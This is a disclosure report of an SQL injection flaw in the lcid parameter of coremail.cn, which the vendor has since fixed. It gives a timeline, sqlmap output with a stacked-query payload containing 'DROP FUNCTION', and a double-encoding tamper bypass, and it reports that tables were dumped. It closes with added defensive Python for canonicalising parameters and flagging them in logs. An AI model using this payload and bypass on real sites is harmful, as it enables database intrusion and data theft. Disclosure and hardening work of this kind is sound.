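2015-07-20: Details reported to the vendor; awaiting vendor handling
2015-07-22: Vendor confirmed; details disclosed to the vendor only
2015-08-01: Details disclosed to core white hats and experts in related fields
2015-08-11: Details disclosed to regular white hats
2015-08-21: Details disclosed to intern white hats
2015-09-05: Details disclosed to the public
SQL injection vulnerability on the Yingshi (盈世) main site
The Yingshi (盈世) main site has a SQL injection vulnerability. Some protection is in place, but it can be bypassed with the chardoubleencode.py tamper script from sqlmap.
First, the URL: http://www.coremail.cn/gjzc/index_104.aspx?lcid=66 The injection point is lcid.
Place: GET
Parameter: lcid
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: lcid=66; IF(8842=8842) SELECT 8842 ELSE DROP FUNCTION gcAK--
Running sqlmap directly only identifies the database type.
After bypassing the protection with the chardoubleencode.py script, the database names, table names and table contents can be retrieved.
In total, 93 tables were enumerated in the ysxx201412197372 database.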
Data from two of the tables was dumped to verify the issue.
Filtering
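An added example, not part of the original report and not the vendor's code: because the protection here was bypassed with double URL-encoding, the code below decodes a parameter until it stops changing before validating it, rejects values that needed more than one decode, and flags such requests in access logs. It assumes lcid is a numeric ID; the function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

MAX_ROUNDS = 4  # assumption: deeper nesting than this is rejected outright

def canonicalize(raw):
    """Percent-decode until the value stops changing; return (value, rounds)."""
    value = raw
    for rounds in range(MAX_ROUNDS + 1):
        decoded = unquote(value)
        if decoded == value:
            return value, rounds
        value = decoded
    raise ValueError("too many encoding layers")

def parse_lcid(raw):
    """Return lcid as an int or raise ValueError; raw is the undecoded query value."""
    value, rounds = canonicalize(raw)
    if rounds > 1:
        raise ValueError("multiply-encoded parameter")
    # Allow-list: a short run of ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError("lcid must be a short decimal integer")
    return int(value)

def flag_multiply_encoded(urls):
    """Return (url, parameter) pairs whose value needs more than one decode."""
    hits = []
    for url in urls:
        for pair in urlsplit(url).query.split("&"):
            name, _, raw = pair.partition("=")
            try:
                rounds = canonicalize(raw)[1]
            except ValueError:
                rounds = MAX_ROUNDS + 1
            if rounds > 1:
                hits.append((url, name))
    return hits

# Constructed request lines (not taken from real logs).
SAMPLE_REQUESTS = [
    "/gjzc/index_104.aspx?lcid=66",
    "/gjzc/index_104.aspx?lcid=%36%36",      # single encoding: accepted
    "/gjzc/index_104.aspx?lcid=%2536%2536",  # "66" encoded twice: flagged
    "/gjzc/index_104.aspx?lcid=66%253B",     # ';' encoded twice: flagged
]

if __name__ == "__main__":
    for url, name in flag_multiply_encoded(SAMPLE_REQUESTS):
        print("multiply-encoded parameter", name, "in", url)
```

The validated integer should then reach the database as a bound parameter rather than being concatenated into the SQL text, so the query no longer depends on the filter.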
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-07-22 15:06
Thank you for the feedback; this vulnerability has been fixed.
None yet